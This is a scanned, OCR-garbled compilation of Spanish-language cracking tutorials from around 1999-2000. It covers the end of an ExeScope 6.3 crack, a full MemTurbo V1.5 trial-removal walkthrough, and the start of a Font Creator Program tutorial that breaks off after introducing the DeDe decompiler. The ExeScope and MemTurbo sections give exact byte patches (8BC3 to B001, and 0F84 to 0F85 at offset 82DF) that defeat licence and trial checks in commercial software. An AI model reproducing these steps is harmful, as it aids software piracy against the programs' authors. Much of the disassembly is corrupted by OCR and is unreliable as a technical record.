dejen que el programa llegue a la rutina de error. Como podemos ver en las referencias, estos 
saltos están en 004A6146 y en 004A615A. 


:D00416130 8B15402294B00 mov edx, dword ptr [004B2940] 
:00416136 8B12 moy edx, dword ptr [edx] 
:D004146138 117C274BO00 mov eax, dword ptr [004B277C] 
:0041613D 5B00 moy eax, dword ptr [eax] 
:D00414613F Espss00000 call 004A4E21C 

:00416144 84C0 test al, al 

:004146146 0OF545D000000 je 004161D9 

:00414614C 11C4294B00 moy eax, dword ptr [004B29C4] 
:00416151 S5B00 moy eax, dword ptr [eax] 
:004A46153 ESEODCFSFF call 00403E35 

:004146158 85c0 test eax, eax 

:D004146154 7E7?D jle 004161D9 

:00414615€ S8D55FO lea edx, dword ptr [ebp-10] 
:00414615F 21D0294B00 row eax, dword ptr [004B22D0] 


Efectivamente, tenemos un JE y un JLE que nos hacen saltar a nuestra función de error. El 
rimer salto que encontramos es el del JE, que por lo que veo, la rutina de comprobación se 
ealiza mediante “CALL 004AE21C” y si devuelve el registro AL=0, salta a nuestra función 
de error. Después está el JLE, pero primero vamos a ver si parcheando tan solo este ya nos 
vale y si no, pues ya miraremos el otro. Recuerdo de nuevo que prefiero mirar el JE antes que 
el JLE porque es el primer salto al que llego (es decir, a ese voy a llegar siempre, mientras 
que al otro puede que llegue o puede que no). Pues dado que lo que necesitamos es que la 
llamada a la subrutina ubicada en 004AE21C nos devuelva AL distinto de cero, vamos a ver 
qué hay en esa subrutina. Así que nada, nos vamos a la línea de código 004AE21C. Vemos 
que hay bastante para leer en esa subrutina, pero a nosotros lo único que nos interesa es que 


nos devuelva AL distinto de cero. Por tanto, bajamos hasta encontrar su RET y vemos esto: 


Muchos saltos, muchas instrucciones, ojos rasgados... pero el caso es que de todo, lo único 
que queremos es que nos devuelva AL con un valor distinto a cero. Sin embargo vemos una 
cosa curiosa, y es que antes del RET hay un CALL, no un montón de POPs que es lo que 
suele haber siempre. Por ello, se nos ocurre volver a tracear el ExeScope con el SoftICE 
poniendo un bpx en 004AE21C, es decir, en la llamada a la subrutina. Una vez nos salte el 
softICE en ese punto vamos traceando con Fl0 y cuál es nuestra sorpresa al comprobar que 
mediante algún chanchullo raro del CALL situado antes del RET, tras el RET no vuelve a la 
línea posterior a la llamada a 004AE21C, sino que continúa por 004AE2C5, código situado 
justo debajo de nuestro RET: 


:004AE2B5 


:DO04AEZ2BE 


En 004AE2C5 vemos que se asigna a EAX el valor de EBX y que si seguimos traceando, el 


RET que hay cuatro líneas más abajo (en 00O4AE2CA) nos lleva a donde nos debía haber 
llevado el RET anterior. 


:00416158 85€0 
:004161514 7E7D 
:00414615€ SDS55FO 
:D00414615F A1D0294B00 


test eax, eax 

jle 004161D9 

lea edx, dword ptr [ebp-10] 
mov eax, dword ptr [004B229D0] 


O 38B1540294B00 mov edx, dword ptr [004B2940] 
:00416136 8B12 mov edx, dword ptr [edx] 
1:D0446138 A17C274B00 mov eax, dword ptr [004B277C] 
tión 53B00 mov eax, dword ptr [eax] 
:D0414613F ESsDs3s800000 call 00414E21C 

00946144 384C0 test al, al 

¡"DU2A6126 OF5458D000000 je 004161D9 

¡*D02A6140 11C4294B00 mov eax, dword ptr [004B29C4] 
(1004146151 5B00 mov eax, dword ptr [eax] 
o ESEODCF5FF call 00403E35 

| 

| 

| 


Bien, pues tras nuestro paseo por la CALL 004AE21C, estamos ya donde nos interesa, en 
004A6144, donde se comprueba que AL tenga un valor distinto de cero para así no saltar al 
error. 


Ahora es cuestión de juntar las piezas, que son bastante pocas. El caso es que queremos que 
AL no valga cero. Eso lo queremos justo al volver del CALL que hay en 004A613F. Por 
tanto, lo lógico sería que antes del RET de ese CALL dejásemos de alguna forma a AL 
valiendo algo que no fuese cero. Sin embargo, hemos visto que no terminamos en el RET de 
ese CALL, que es el situado en 004AE2BD, sino que regresamos por el RET que hay en 
004AE2CA justo después de asignar (en 004AE2C5) a EAX el valor de EBX. Por tanto, lo 
que se me ha ocurrido para poner a un valor distinto de cero el registro AL antes del RET de 
004AE2CA es modificar: 


004AE2C5  8BC3 mov eax, ebx 
por: 
004AE2C5  B001 mov al, 01 


con lo que todos contentos. Vale, ahí queda nuestra hipótesis, que hay que probar, así que 
nada, a cogerse el editor hexadecimal que tengas más a mano (yo suelo usar el UltraEdit) y a 
cambiar ese código. 


Bueno, sustituimos el 8BC3 por B001 y ejecutamos el ExeScope. Nos vamos a Help-Regist y 
mira por dónde, ahora nos aparecen asteriscos donde la clave y si ponemos un nombre nos lo 
acepta, pero al volver a intentar registrarnos vemos que nuestro nombre no aparece. Sin 
embargo lo que queríamos, que es poder realizar más de una modificación en los archivos 
que abramos, vemos que podemos hacerlo sin problemas. Qué ocurre aquí? Es acaso un 
Expediente X? De repente el programa se ha vuelto bueno y nos deja hacer lo que queramos? 
Quizá es que el fín del mundo está cerca? Que va, mucho más sencillo. Lo que ocurre es que 
no hemos reventado las comprobaciones tras la rutina de comprobación de la clave, sino que 
hemos reventado la rutina de comprobación de la clave en sí, es decir, dicha rutina siempre 
nos devuelve que tenemos una clave válida. Es por ello que al arrancar el programa, acude a 
la rutina de comprobación de la clave y directamente supone que tenemos una clave válida. 
En resumen: ExeScope 6.3 CRACKEADO! 


S1 por lo que sea, alguien quiere que al meterse en lo de registrarse le aparezca su nombre, 
basta con añadir en el archivo exescope.ini las siguientes líneas: 


[Reg] 
Name=MacEdu 


sustituyendo “MacEdu” por el nombre que quiera. 


Un detalle interesante es que en lugar de ver dónde acaba la rutina de comprobación y poner 
ahí que AL valga 1, podríamos haber cambiado directamente la llamada a la rutina de 
comprobación por la sentencia que pone AL a 1. Sin embargo, poniéndolo al final de la rutina 
y no en la llamada a la rutina, nos curamos en salud por si acaso en algún otro punto del 
programa se vuelve a llamar a dicha rutina que por tanto daría un AL=0, es decir, descubriría 
que nuestra clave es falsa. 


'Y con esto acabo mi maravilloso manual sobre el crackeo de este interesante programa. Si 
alguien tiene alguna duda, más abajo indico mi mail. Una última cosa que me gustaría 
comentar es que hay por ahí un manual sobre el crackeo de la versión 6.0 del ExeScope 
escrito por “Caos reptante” que en vez de ir a lo fácil como he hecho yo (es que soy más vago 
que mear sentao) que es directamente cargarte la rutina de comprobación, él hace un 
minucioso estudio del algoritmo de comprobación de claves obteniendo al final una fórmula 
que le da todas las claves correctas posibles (amos, que ha hecho lo que se debería hacer si 
quisieras hacer un KeyGen). La verdad es que está interesante. Es una lástima que en la 
versión 6.3 el algoritmo no sea exactamente igual que en la 6.0, porque siempre queda más 
curioso encontrar una clave correcta que reventar la protección, así que si alguien quiere 
estudiarse el algoritmo de la 6.3 para sacar sus claves, adelante. 


Por último agradecer a mi gente (akél que piense que lo es, que imagine que se da por 
aludido) por aguantarme durante todos estos años, a Klod por enseñarme a tocar la guitarra, a 
Toni, y de nuevo a Klod, por esas fabulosas noches de pintas y mariscos, a mi abuela (k hace 
unos canelones...), a mi padre (que me aguanta aunque yo no razone), a mi hermano (aunque 
a veces hay que ver que pesao se pone....) y por supuesto a Karpoff, a Estado+Porcino, y 
todos aquellos que comparten sus conocimientos de forma desinteresada, sin cuya ayuda aún 
estaría creyéndome un genio por bajarme un crack de astalavista y crackear el mIRC. 


Un saludo: MacEdu (yoga444 GO hotmail.com) 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en 


Castellano, sobre Ingenieria Inversa y Programacion. Email "Colabora con tus 
Proyectos" 


HH Tutoríal de Crackeo Para Newbies desde Cero 30/11/99 
Por Karpoff HH KARPOFF-NEW 98/99 ¿Hit 

PROYECTO 16 +Ht 

- MemTurbo V1.5 

INTRODUCCION 


Hola peña vamos a por el proyecto 16, si habeis seguido todos desde el n*1 ya no sois 
newbies, sois la nueva generacion de Crackers Jejeje :-) 


Bueno otro mas, en este manual vamos a Cambiar la forma tipica de crackeo que se 
muestra generalmente en los manuales. osea, no vamos a buscar el mensaje de 
expiracion, o el de serial number incorrect etc. y a partir de los mensajes buscar un 
salto y modificarlo. Hoy utilizaremos una herramienta que ya conocemos que es genial y 
que parece que se usa muy poco ya que no se ve en ningun manual, se trata de APIS32 
V2.4, la ultima vez que utilizamos esta herramienta ( en mis manuales ) fue para que 
nos mostrase la funcion que debiamos utilizar como break point o punto de ruptura en 
el SoflIce, hoy esta herramienta nos evitara un costoso trabajo, ya que vamos a 
crackear este programa mediante las Apis de Windows es decir evitaremos que el 
programa lea los datos que guarda en el registro de Windows y que le informan del 
tiempo que queda de evaluacion. Las APIS mas utilizadas para este tipo de 
procedimientos son las siguientes. 


RegCloseKey /a /exa - Cierra una Clave en el registro de windows 
RegCreateKey /A /Exa - Crea una clave en el registro de Windows 
RegDeleteKey /A /Exa -— Borra una clave en el registro de Windows 
RegO0penKey /A /Exa - Abre una Clave en el registro de Windows 
RegQueryValueA /Exa - Lee una clave en el registro de Windows 


Evidentemente hay algunas mas. 


Primero quiero aclarar que cuando empece a crackear este programa segui el tipico 
procedimiento de evitar que el programa caducase y evitar el nag mediante los mensajes 
de expired program etc. Y fue bastante engorroso, Pero cuando fui a probar si 
funcionaba bien el crack, me di cuenta de casualidad que este crack solo funcionaba 
durante su periodo de 30 dias pasados los 30 dias el programa aparentemente seguia 
funcionando no daba errores todo normal, pero casualmente no hacia la unica funcion 
que tenia que hacer que es la de recuperar memoria en Windows Jejeje, me quede tan 
sorprendido que probe con la version anterior la v1.0b y lo mismo, y se me ocurrio 
probar los cracks que tenemos en astalavista y curiosamente no valen ninguno, parece 
que se ha pasado por alto que si el programa lee una determinada clave del reg de 
windows, por mucho que evitemos los mensajes de expiracion el programa no funciona, el 
programador a sido muy cuco, ya que cuando existe una proteccion de este tipo 
generalmente si lees las ayudas del programa, el propio programador te informa de que 
si utilizas el programa cuando ha pasado la evaluacion este funcionara mal, como es el 
caso del English-Spanish Interpreter. 


Y a vosotros que coño os importa eso?? Bueno lo que intento decir es lo que os he 
dicho, que siempre nos guiamos mediante los mensajes de error y a partir de hay 
atacamos, pero yo siempre os digo que probeis cualquier cosa que se os ocurra y 
comprobar siempre que el crack funcione a la perfeccion, es bueno tener esa costunbre 


obtendreis muy buenos resultados. 


PRIMERA PARTE 


La victima es MemTurbo V1.5 la ultima y recien salida version de esta gran utilidad, 
que desfragmenta la memoria Ram liberandola, ya que Windows nos agota la memoria 
enseguida utiliza toda la que tenemos da igual 64 MB que 128 si poneis un medidor 
vereis que siempre esta bajo minimos, esta utilidad nos soluciona el problemilla. El 
programa lo podeis coger de: 


http: //www.memturbo.com/downloads/memturbo.exe 


HERRAMIENTAS 


FileMon V4x ( he no tiene nada que ver con Mortadelo, que quede claro) 


TechFacts 98 o 95 


APIS32 V2.4 


W32Dasm 8.93 


Editor Hex (el que mas os guste) 


COMPORTAMIENTO DEL PROGRAMA 


Tenemos 30 dias de evaluacion, pasados los 30 dias el programa deja de funcionar 
mostrandonos una pantalla con un texto para la ocasión, no tenemos opcion de registrar 
el programa mediante los tipicos procedimientos. 


ATAKE 


Lo primero averiguar como y por que sabe el programa que han pasado 30 dias, una vez 
averiguado evitar que lea los datos que le indican la evaluacion o si lee los datos 
modificaremos el codigo para que se comporte siempre como si estariamos evaluando el 
programa. Este atake es muy util en programas que se ejecutan sin ningun tipo de 
limitacion, como nag, funciones desvilitadas etc. durante la evaluacion, es logico 
pensar que si durante 30 dias el programa funciono perfectamente hay algo que le esta 
indicando los dias que van pasando, puede ser un archivo .ini, o cualquier otro tipo 
de archivos o lo mas logico una claves o keys en el reg de Windows. 


SEGUNDA PARTE 


A TRABAJAR 


Como siempre lo primero prepararnos todo para trabajar comodamente, hacemos una copia 
del ejecutable MemTurbo.exe y le ponemos el nombre Turbo.exe y dejamos los dos 
ejecutables en el mismo directorio. 


Como podemos averiguar que es lo que le indica a MemTurbo.exe los dias de evaluacion 
que nos quedan?? Lo primero tenemos que averiguar si MemTurbo.exe lee el tiempo de 


evaluacion de un archivo o de el registro de Windows, descartemos posibilidades vamos 
a ejecutar el FileMon, os recomiendo que cerreis todos los programas que teneis en 
memoria, como puede ser un antivirus, o cualquier otro asi el filemon nos mostrara 
informacion solo sobre MemTurbo.exe pos eso, ejecutamos el Filemon y seguidamente 
MemTurbo.exe Justo cuando se termine de ejecutar MemTurbo.exe vamos al filemon y 
pulsamos capture (el boton de la lupa), y analizamos el mogollon de eventos, pero todo 
son lecturas de ficheros de sistema, no hay nada que nos indique que tenemos un 
archivo que le informa del tiempo de evaluacion. ( este proceso podia saltarmelo, pero 
en los manuales siempre indicamos el camino final nunca se dice por todo lo que se 
paso y todo lo que se probo hasta llegar a la solucion, haciendo que parezca que se 
acierta a la primera, y no es asi.) 


Dicho lo dicho traceemos el registro de Windows, para ello tenemos el RegMon pero no 
lo vamos a utilizar por que es tanta la informacion que nos da que complica muchisimo 
el localizar lo que queremos como sustituto tenemos el fabuloso TechFacts 95/98, 
ciertamente esta utilidad tambien nos sustituye al filemon, nos va ha mostrar solo los 
cambios que realice MemTurbo.exe tanto en el disco duro, archivos.ini, registro de 
Windows etc.( si no teneis esta herramienta la podeis bajar de mi web y teneis un 
manual sobre como crackearla) 


Para realizar este proceso ejecutamos TechFacts vamos a Tools pulsamos Watach System, 
activamos la casilla Run This Program y seleccionamos MemTurbo.exe, como muestra la 
imagen. 


ESoftwarerMemTurboMemTurbo.exe : 


CXAWINDOWSVWIN.INI 
CXAWINDOWSASYSTEM.INI 


Bien una vez que tenemos seleccionado Menturbo.exe pulsamos el boton GO que no se 
muestra en la imagen pero esta abajo, y TechFacts empezara a comprobar como esta 
nuestro sistema, hara una imagen y cuando termine empezara la ejecucion de 
MemTurbo.exe, hará otra comprobacion para ver los cambios y nos los mostrara. En mi 
caso esto fue lo que me mostro. 


No changes made to INI file: C:IWINDOWSAIWIN.INI 


No changes made to INI file: C:IWINDOWSASYSTEM.INI 


Registry key values changed: (4) 


HKEY_USERSY .DEFAULTASoftware1MicrosoftYWWindows1CurrentVersionlExplorerlDataViewStream- 
MT15 


Value "Settings-MT15": from "A0,E4,15,90,DD,6C,C0,01" to "80,FF,EB,DC,DD,6C,C0,01" 


HKEY_CURRENT_USERISoftwareMicrosoftYWindowsYCurrentVersionExploreriDataViewStream- 
MT15 


Value "Settings-MT15": from "A0,E4,15,90,DD,6C,C0,01" to "80,FF,EB,DC,DD,6C,C0,01" 


Esta clarisima la importancia que tienen que tener estas claves no os parece ?, 
pensemos como podemos comprobar que son estas las claves que verifican la evaluacion, 
lo que se me ocurre es adelantar la fecha para caducar el programa y comprobarlo , es 
muy importante que salvemos esas claves del registro antes de adelantar la fecha, y 
creo que no hara falta que diga que no toquiteeis nada en el reg de windows solo lo 
que yo os diga, por que el resultado puede ser caotico. 


Bueno ejecutamos RegEdit si alguien no sabe que es, Regedit es el editor del registro 
de Windows por lo general no tenemos ningun icono para poder acceder, pero podemos 
ejecutarlo desde el directorio de Windows donde vereis un archivo con un iconito azul 
llamado Regedit.exe, o desde el menu de inicio de windows pulsamos ejecutar e 
insertamos la palabra regedit.exe pulsamos Return y se habre el editor, Buscamos las 
Cadenas y las exportamos completas, para exportarlas seleccionais la carpeta que 
contiene la clave y pulsais en el menu, en registro, exportar archivo de registro, y 
guardais cada exportacion con el nombre que mas os guste, hacemos lo mismo con las 2 
claves. (esto que se muestra abajo son las carpetas del registro donde se encuentran 
las claves a exportar, teneis que exportar las carpetas completas, (seleccionando lo 
que estan en rojo y exportais) y dentro de ellas iran los valores que tienen.) 


HKEY_USERSN .DEFAULTASoftwarelIMicrosoftYWWindowsCurrentVersionlExplorerlDataViewStream- 
MT15 


HKEY_CURRENT_USERISoftwareMicrosoftYWindowsYCurrentVersionExploreriDataViewStream- 
MT15 


Una vez exportadas la 2 claves adelantamos la fecha de Windows 2 meses, aseguraros de 
no tener ningun programa abierto que pueda sufrir algun tipo de modificacion al 
adelantar la fecha, dicho esto y con la fecha adelantada ejecutamos MemTurbo.exe y... 
claro toma!! el pantallon que nos dice que se paso el tiempo de evaluacion, como veis 
no hay opcion de que siga funcionando, a no ser que nos registremos J , osea que 
cerramos la ventana y ya no hay manera de que funcione MemTurbo. Bien ahora 
restauramos la fecha de Windows ejecutamos nuevamente MemTurbo.exe y sigue sin 
funcionar jejeje que putada no? Hagamos lo siguiente, de momento no vamos a restaurar 
las claves que hemos salvado, primero recomiendo que eliminemos las claves del 
registro de Windows, asi que las localizamos y las eliminamos completas, osea lo que 
marco en rojo tambien que son las carpetas que contienen las claves. 


HKEY_USERSN .DEFAULTASoftwarelMicrosoftYWWindows1CurrentVersionlExplorerlDataViewStream- 
MT15 


Value "Settings-MT15": from "A0,E4,15,90,DD,6C,C0,01" to "80,FF,EB,DC,DD,6C,C0,01" 


HKEY_CURRENT_USERISoftwareMicrosoftYWindowsYCurrentVersionExploreriDataViewStream- 
MT15 


Value "Settings-MT15": from "A0,E4,15,90,DD,6C,C0,01" to "80,FF,EB,DC,DD,6C,C0,01" 


Y ejecutamos nuevamente MemTurbo.exe y vemos que funciona perfectamente si traceamos 
con TechFacts veremos que se han creado unas claves nuevas por lo tanto no hace falta 
restaurar las anteriores, (si a alguien no le funcionase que restaure las claves que 
tenemos exportadas pero estoy seguro de que no tendreis problemas ). 


Bueno ya hemos averiguado que estas claves son las que le informan a MemTurbo de la 
evaluacion, si probais a tracear dos o tres ejecuciones seguidas vereis que siempre 
las modifica, que podemos hacer ahora?? 


Pos muy sencillo buscar en MemTurbo.exe la Api encargada de hacer esta comprobacion, 
yo pienso que la comprobacion se hara mas o menos asi. Mediante RegOpenKey /A /exa 
Habrira las claves con RegQueryValue /A /exa comprueba el valor de la clave y se 
calculan los dias de evaluacion y con RegCloseKey /a /exa cierra la la parte encargada 
de esta comprobacion, si evitamos o intentamos modificar la funcion que hace 
RegO0penKey /A /exa podemos evitar que expire el programa, pero como localizamos la api 
exacta que realiza este trabajo, ya que en un programa a parte de estas claves seguro 
que se comprueban muchisimas otras, podiamos utilizar el Softlce y despues de algunas 
traceadas localizariamos sin duda la que nos interesa, pero nos vamos a ahorrar mucho 
trabajo si utilizamos APIS32 V2.4 que insisto en que es una herramienta mucho mas util 
de lo que os pensais. Ale Pues manos a la obra 


Ejecutamos Apis32 y veremos esta imagen. 


E ReaClosekKey [HANDLE ] 
: 2: RegConnectFiegistá ([LPSTR, HANDLE, LPDATA ] 
: RegConnectRegistiyw' [LPWSTR, HANDLE, LPDATA ] 
: RegCreateKeyá [ HANDLE, LPSTR, LPDATA ] 


: RegCreateKeyExó [ HANDLE, LPSTR, DWORD, LPSTR, DWORD, DWORD 
: RegCreateKeyw' [ HANDLE, LPWSTA, LPDATA ] 

: RegDeleteKeyó [ HANDLE, LPSTR ] 

: RegDeleteKeyw' [ HANDLE, LPWSTRA ] 

: RegDeleteYalueó, [ HANDLE, LPSTA ] 

: RegDeleteWaluew' [ HANDLE, LPWSTA ] 

: RegEnumkKeyá [ HANDLE, DWORD, LPSTR, DWORD ] 

: RegEnumkKeyExá [ HANDLE, DWDRD, LPSTR, LPDATA, LPDATA, LPSTR, 
: RegEnumkKeyw* [ HANDLE. DWORD, LPWSTR, DWORD ] 

: RegEnumValueó, [ HANDLE, DWORD, LPSTR, LPDATA, LPDATA, LPDATA, 
: ReoFlushKey [ HANDLE ] 

: ReaGetKeySecurity [ HANDLE, DWORD, LPDATA, LPDATA ] 


Expliquemos algo sobre esta herramienta. Es imprescindible que tengais bien 
configurada APIS32, por lo menos que se encuentren la lista de APIs que utiliza el 
programa en cuestion, para incluir APIs en la lista tenemos la Opcion add que vemos en 
la imagen, si pulsais sobre ese boton os mostrara una lista con los archivos 
habituales que utiliza Windows y al seleccionar uno de los archivos os mostrara toda 
la lista de Apis que pueden ser importadas de cada uno de los archivos, o tambien una 
vez que hemos seleccionado el programa que vamos a tracear podemos pulsar sobre 
imports y nos mostrara todas las funciones (APIs) que utiliza ese programa en este Caso 
el MemTurbo, y a partir de hay podemos introducir las que queramos, para introducirlas 
en Apis32 podeis seleccionarlas 1 a 1 solo las que os interese o todas de golpe con la 
opcion add all, no recomiendo introducir todas ya que el informe que nos muestra 
cuando utilicemos Apis32 puede ser demasiado lioso, en este Caso con que esten las 
Apis que manejan el registro de Windows es suficiente. 


Solo nos queda pulsar sobre Run y ver que ocurre, osea que pulsamos y MemTurbo empieza 
a ejecutarse vemos como se va creando un listado de informacion en la ventana de 
Apis32, como es de suponer una vez que MemTurbo ya se ha ejecutado este habra 
realizado todas las comprobaciones en el registro de Windows no?, bueno pues tendreis 
en pantalla una ventana como esta, que variara su contenido dependiendo de las Apis 
con que tengais configurado APIS32. 


00419424: GetCommandLinea () 

00419430: GetCommandlined = 8163CA3C 

00420502: CreateMailslotiíLPWSTR: 00000001 DWORD: 0045FD50,DWORD: 00000001, 
004205C8:CreateMailslot' = 0 

D041DFCF: GetModuleFileNamed (HANDLE : 00000000,LPSTR: 00473048 DWORD: 000001 
D041DFD5:GetModuleFileNameA = 21 

00421409: GetModuleHandleA (LPSTR:0045FE64: "KERNEL32") 


0042140F: GetModuleHandledA = BFF?0000 
00419478: GetModuleHandleA (LPSTR: 00000000) 


En este momento pulsamos sobre Save LOG y cerramos tanto APIS32 como MemTurbo, y en el 
directorio donde tengais instalado MenTurbo V1.5 se ha creado un archivo llamado 
MemTurbo.log, donde se encuentran todos los datos del proceso de ejecucion, ale vamos 
a editarlo y ver su contenido, ...... 


Como veis hay mucha información sobre todas las funciones que importa MemTurbo, pero 
Nosotros de momento solo necesitamos las funciones del registro de Windows y en mi 
.1log veo esto. 


004082C5:RegO0penKeyExA (HANDLE :80000001,LPSTR:004719F4: 
"SoftwareYMicrosoftYWWindowsYCurrentVersionExplorerl DataViewStream-MT15.., 
DWORD:00000000,DWORD:00000003,LPDATA:006DF5F8) 


004082CB: RegOpenKeyExA = O 


00408357:RegCreateKeyExA (HANDLE :80000001,LPSTR:004719F4: 
"SoftwarelMicrosoftYWWindowslCurrentVersionlExploreriDataViewStream-MT15.., 
DWORD:00000000,LPSTR:0046E820:"REG_BINARY",DWORD:00000000,DWORD 


:000F003F, LPDATA:00000000,LPDATA:006DF5F4,LPDATA:006DF5FO0) 


0040835D: RegCreateKeyExA = 0 


004083A6: RegSetValueExA (HANDLE :C29AFACO, LPSTR:004719E4: "Settings-MT15", 
DWORD:00000000,DWORD:00000003,LPDATA:006DF5DC, DWORD:00000008) 


004083AC: RegSetValueExA = 0 


004083D2: RegCloseKey (HANDLE :C29AFACO) 


004083D8: RegCloseKey = 0 


00408439:RegCreateKeyExA (HANDLE :80000001,LPSTR:00471A3C: 


"SoftwareliMicrosoftYWindowsXCurrentVersionExploreriDataViewSettings- 
MT..,DWORD:00000000, LPSTR: 
0046E820:"REG_BINARY",DWORD:00000000,DWORD:000F003F,LPDATA: 00000000, 
LPDATA:006DF5F4,LPDATA:006DF5F0) 


0040843F: RegCreateKeyExA = 0 


Bueno como digo entre muchisimos otros datos estos son los registros que me parecen 
muy interesantes, si os fijais en rojo tenemos las claves que habiamos localizado con 
TechFacts98 , vemos que Api las manipula e incluso nos muestra la direccion de memoria 
de la Api que realiza las comprobaciones, seguramente para localizar esto con el 
SoftIce hubiesemos dado muchas vueltas, ahora vamos a pasar a la parte del 
desensamblado. 


Teniamos MemTurbo.exe y una copia de este con el nombre Turbo.exe bueno pues 
desensamblamos MemTurbo.exe y con el editor Hex editamos Turbo.exe 


La direccion de memoria donde se habre por primera vez la clave que nos interesa es 
004082C5 


004082C5:RegOpenKeyExA (HANDLE :80000001,LPSTR:004719F4:"SoftwarelIMicrosoftYWindows 
XCurrentVersionl ExplorerliDataViewStream- 
MT15..,DWORD:00000000,DWORD:00000003,LPDATA:006DF5F'8) 


veamos que hay en esa direccion de memoria, asi que en W32dasm con la opcion find (la 
linternita) buscamos la direccion 004082C5 y nos lleva a: 


* Reference To: ADVAPI32.RegOpenKeyExA, Ord:0172h 


:004082C5 FF150C704500 Call dword ptr [0045700C]--- AQUI 
:004082CB 6448 push 00000048 

:004082CD 6A00 push 00000000 

:004082CF 57 push edi 

:004082D0 8945F0 mov dword ptr [ebp-10], eax 
:004082D3 E8180E0100 call 004190F0 

:004082D8 83C40C add esp, 0000000€C 

:004082DB 837DF000 cmp dword ptr [ebp-10], 00000000 
:004082DF 0F84E2010000 je 004084C7 -=-=-=-- Que Interesante 
:004082E5 8D45C8 lea eax, dword ptr [ebp-38] 
:004082E8 50 push eax 


Concretamente a la api que abre la clave del registro, lo que aquí parece que ocurre 
es: RegO0penKeyExa abre la clave que utiliza memturbo para controlar la evaluacion, y 
mediante una serie de comprobaciones a traves de 004082D3 call 004190F0 se decide si 
se ejecuta o no el salto condicional que hay en 004082DF estas comprobaciones se lian 
mogollon, podeis tracearlo con el SoftICE, yo no lo hice cuando crackee este programa, 
pero posterior si lo tracee y si quereis aprender mas os recomiendo que pilleis el 
SoftIce poneis un Break Point a 004082d3 y empezais a tracear a partir de esa Call. 
Vereis la de vueltas que damos para arriba y abajo hasta llegar a el salto 0040820df. 


Bueno pues probemos a invertir el salto convirtiendolo en un jne y veamos los 
resultados, localizamos el offset de 004082DF je 004084C7 Que se muestra en la parte 
inferior de W32dasm, en la barra de estado, y es 000082DFh los ceros no se ponen y la 
"h" tampoco, asi que vamos al editor Hex y el cambio que tenemos que hacer es 


cambiamos 004082DF 0F84E2010000 je 004084C7 


por 004082DF 0F85E2010000 jne 004084C7 


para hacer el cambio metemos el offset 82DF en el editor Hex, con la opcion GOTO 
(dependiendo del Editor) y veremos esto (dependiendo del editor que se use en unos 
estan los numeros juntos, en otros en pares etc. Pero siempre seran los mismos.) 


0Fr84 E201 0000 y cambiamos por 0F85 E201 0000 


salvamos los cambios y 


ya solo nos queda probar, para ver si hemos acertado tenemos que adelantar otra vez la 
fecha, osea que cerramos los programas que puedan sufrir alteracion por el cambio de 
fecha (versiones triales etc.) adelantamos 2 meses la fecha de Windows y ejecutamos el 
archivo Turbo.exe que es el que hemos modificado y Voooila ¡! parece funcionar 
probamos a ver si desfragmenta la memoria y asi es bien, cerremos Turbo.exe y 
restauremos la fecha, ahora probamos otra vez y sigue funcionando miramos otra vez si 
desfragmenta la memoria y efectiviwonder, el funcionamiento es perfecto. 


Pues como siempre espero que os sirva para adquirir conocimiento, para entender un 
poco mas esto del crackeo y principalmente para divertiros 


Ya sabeis que para cualquier duda podeis contar con migo, atiendo todos los email con 
preguntas, sugerencias, criticas etc. Pero no atiendo pedidos de Cracks. 


Un saludo a todfts 


Karpoff /TNT! 


EMAIL: Kf karpofffhotmail.com 


URL: http://welcome.to/karpoff 


http://members.xoom.com/kf karpoff 


El uso de este material es solo para uso educativo, por ahora los cracks son 


ilegales cada cual es responsable del uso que le de a este tutorial, el autor no se 


hace responsable de nada. 


Karpoff Spanis 
Tutorial Descargado de a 


Karpoff Spanish Tutor 


Programa: Font Creator Program v2.2 


PROTECCION: Time Trial. Hay que introducir un número de serie 


Descripcion: 


Creador de Fuentes, con gran personalización 


Dificultad: Principiante 


Herramientas: | SoftICE v3.x; DeDe v2.4 


CRACKER: Leirus FECHA: 08/08/2000 


| INTRODUCCION 


Como siempre, antes de toquetear y puñetear por ahí, debemos empezar a ver como 
funciona el programa, para conocer cuanto más mejor. 

Ejecutamos, y nos encontramos con una bonita Nag que nos dice "yo he hecho este 
programa que es la ostia, pero me he llevado 13 meses programándolo, así que págame 
Z$". Abonamos bien abonado su árbol genealógico (para los lamers, me he cagado en su 
puta madre), y le damos al desafiante botoncillo flotante de REGISTER, y ... ! oh 
vaya !. Una pobre caja de diálogo aparece como por arte de birlibirlogque (como diría 
Karlitoxz) pidiéndonos Nombre, Compañia y Serial. Ponemos lo que sea y nos aparece 
una messagebox que no nos va a interesar en este tutorial. 

Con el Filelnfo o herramienta similar analizamos de que está hecho el ejecutable, y 
descubrimos que no sólo no está empakado, sino que está escrito en Delphi. 

Bueno, creo que tenemos suficiente información como para poner esto en tela de juicio 
y empezar a cargar las pilas para el atake. Vamos a allá. 


AL ATAKE 


DISCLAIMER: Previamente, quisiera decir que este tutorial ha sido escrito con fines 
educativos y científicos, y que cualquier uso inapropiado del material del mismo puede 
sufrir la pérdida de datos inintencionadamente. Asi mismo, declino toda responsabilidad del 
uso personal que los lectores de este tutorial puedan hacer con la información que a 


continuación les detallo 


Introduccion al Inquietante Mundo del DeDe: 


Lo que en realidad vamos a hacer en este tutorial es dar información a los Newbies sobre 
cómo se utiliza un de las mejores utilidades que podrá encontrar cualquier cracker a la hora 
de destrozar programas compilados en cualquiera de las versiones de Delphi. Nos estamos 
refiriendo al estupendo DeDe, creado por Dafixer, que nos permitirá entre muchas otras cosas 
decompilar los procedimientos y ver con claridad el código ensamblador de los distintos 
controles del programa analizado. Bien, pues vamos a analizar un poco cómo usar el DeDe. 
Para empezar, al ejecutar el programa, vemos una barra con los distintos comandos: CLASESS 
INFO, FORMS, PROCEDURES, PROJECT Y EXPORTS. Para el que esté familiarizado con este lenguaje 
de programación no le será difícil descifrar lo que se esconde detrás de cada comando. De 
modo somero explicaré que las CLASSES INFO nos proporcionará un listado completo de todas 
las clases que utiliza el programa. En FORMS, creo que está claro: nos señala las 
Características de los formularios del programa. PROCEDURES es lo más importante de este 
programa o al menos la características que vamos a explotar a la hora de crackear programas. 
Esto permite ver los distintos procedimientos del programa, así como el código ensamblador 
de los eventos relacionados con los distintos objetos del programa. Una maravilla, vamos. En 
PROJECT podemos salvar el decompilado del programa para que no tengamos que decompilarlo en 
cada vez en estudios posteriores. En EXPORTS podremos crear un archivo MAP para añadir y 
exportar los procedimientos detectados al IDA. Muy útil para aquellos más familiarizados con 
este programa. 
En cuanto a los menus, deciros que los DUMPERS y las TOOLS no las vamos a utilizar en 
general. 

Hecha y la introducción al programa, pasemos a su estudio "interior". 


Por las Entrañas de Font Creator Program: 


